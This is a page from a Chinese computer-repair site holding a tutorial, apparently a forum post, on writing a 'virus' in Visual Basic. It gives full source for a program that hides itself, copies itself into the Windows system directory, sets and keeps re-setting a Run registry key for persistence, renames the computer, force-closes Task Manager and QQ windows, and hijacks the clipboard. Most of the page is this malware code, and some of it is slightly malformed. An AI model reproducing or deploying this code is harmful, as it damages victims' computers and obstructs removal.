制做病毒|网络安全|木马病毒|木马清除|电脑病毒|计算机病毒|黑客技术|黑客软件-电脑维修知识网

	设为首页
	收藏本站

首页|

基础	维修	硬盘	键盘	内存	声卡	光驱	CPU	显示器	安全
组装	主板	电源	鼠标	显卡	网卡	系统	DOS	注册表	下载

用VB做病毒

你们好！今天我做了一个简单的病毒！希望和大家讨论讨论！

这病毒的功能如下

1 运行时隐藏起来

2 自我复制到系统目录下

3 WIN启动时自我运行

5 不准重复打开这个程序

4 程序运行时不能打开任务管理器，QQ等！

6 计算机名称改变

7 每次粘贴时，出现的是“我是高手我怕谁,我爱你！”

首先介绍一下要用到的API吧（只说功能）

GetForegroundWindow 获得前台窗口的句柄

GetClassName 为指定的窗口取得类名

PostMessage 将一条消息投递到指定窗口的消息队列

GetWindowText 取得一个窗体的标题文字

SetComputerName 设置新的计算机名

GetSystemDirectory 取得Windows系统目录

GetWindow 获得一个窗口的句柄

ShowWindow 控制窗口的可见性

RegOpenKey 打开一个现有的注册表项

RegQueryValueEx 获取一个项的设置值

RegSetValueEx 设置指定项的值

RegCloseKey 关闭系统注册表中的一个项

然后开始编写！

1添加一个: Module1模块

Option Explicit

’声明API

Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.

Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long

Public Declare Function GetForegroundWindow Lib "user32" () As Long

Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Public Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" (ByVal lpComputerName As String) As Long

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long

Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long

’声明常量

Public Const HKEY_LOCAL_MACHINE = &H80000002

Public Const GW_OWNER = 4

Public Const SW_HIDE = 0

’在写一个修改注册表的子过程

Public Sub regedit(strPath As String, strKey As String, strValue As String)

Dim l As Long

Dim s As String

Dim s1 As String

Dim n As Long

Dim keyhand As Long

s = String(255, Chr(0))

s1 = String(255, Chr(0))

n = 255

l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)

If l = 0 Then 是否打开

l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)

If l <> 0 Then 是否也有

l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue))

’修改注册表

End If

l = RegCloseKey(keyhand)

’关闭

End Sub

2 回到FORM1双击窗休:

Option Explicit

Dim systempath As String

选择LOAD事件

Private Sub Form_Load()

Dim K As Long

'不准重复打开这个程序

Dim title As String

If App.PrevInstance Then

title = App.title

App.title = ""

Me.Caption = ""

AppActivate title

End

End If

'--------------

'得到系统的系统目录

systempath = String(255, Chr(0))

GetSystemDirectory systempath, 254

systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)

'自我复制到系统目录

If Not Dir(systempath & "\" & "liuning.exe") = "liuning.exe" Then

FileCopy App.Path & "\" & App.EXEName & ".exe", systempath & "\" & "liuning.exe"

End If

'自动运行

regedit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "高手小病毒", systempath & "\" & "liuning" & ".exe"

'计算机改名

SetComputerName "QQ122273014"

'隐藏

K = GetWindow(Me.hwnd, GW_OWNER)

ShowWindow K, SW_HIDE

Timer1.Enabled = True

Me.Hide

End Sub

再添加一个TIME1控件

Private Sub Timer1_Timer()

'重点

Dim K As Long

Dim s As String

Dim s1 As String

Static n As Long

s = Space(19)

s1 = Space(19)

'得到句柄

K = GetForegroundWindow

'得到类名

GetClassName K, s, 20

'查看当前程序的标题

GetWindowText K, s1, 20

'打开的是QQ或是其它类名是#32770时关闭

If Left(s, 6) = "#32770" Then

' 打开的是WIN管理器

If Left(s1, 7) = "Windows" Then

PostMessage K, &H10, 0&, 0& ’关闭程序

Exit Sub

End If

n = n + 1

If n >= 40 Then

PostMessage K, &H10, 0&, 0& ’关闭程序

n = 0

End If

'认用户粘贴时就会出现

Clipboard.Clear

Clipboard.SetText "我是高手我怕谁,我爱你！"

'不准删除注册表里的信息

regedit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "高手小病毒", systempath & "\" & "liuning" & ".exe"

End Sub